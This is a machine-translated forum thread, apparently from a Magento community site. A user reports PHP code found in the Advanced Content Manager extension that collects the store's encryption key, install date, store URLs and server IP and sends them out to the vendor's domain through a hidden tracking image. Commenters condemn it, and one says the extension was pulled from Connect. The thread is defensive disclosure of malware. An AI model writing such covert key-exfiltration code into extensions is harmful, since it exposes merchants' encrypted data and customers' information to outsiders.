私の無知を許しますが、Magentoのデータを解読するために暗号鍵が使用されますよね?モジュールがこれにアクセスする正当な理由はありますか?Advanced Content Managerをインストールした後、このコードを見つけました...
<div id="banana-tracker">
<?php
$stores = Mage::app()->getStores();
$key = (string)Mage::getConfig()->getNode('global/crypt/key');
$date = (string)Mage::getConfig()->getNode('global/install/date');
$serverIp = $_SERVER['SERVER_ADDR'];
$params = 'key='.$key.'&date='.$date.'&';
foreach($stores as $store)
{
$params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
}
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />
3
この。です。恐ろしい。暗号化キーを漏らす理由はありません。
—
ファビアンBlechschmidt
これは悪い、非常に悪いです。
—
アンナフォルクル
ナイスキャッチ!これは非常に悪いです...
—
サンダーマンジェル
@Sanderに感謝します。Connectから削除されました。
—
ベンマーク
@benmarksはそれを聞いてうれしいです。これは明白な理由だけでなく、アプリが非常に印象的であり、開発者が過去に非常に有用かつ迅速であったため、非常に残念です。
—
タイラーズSN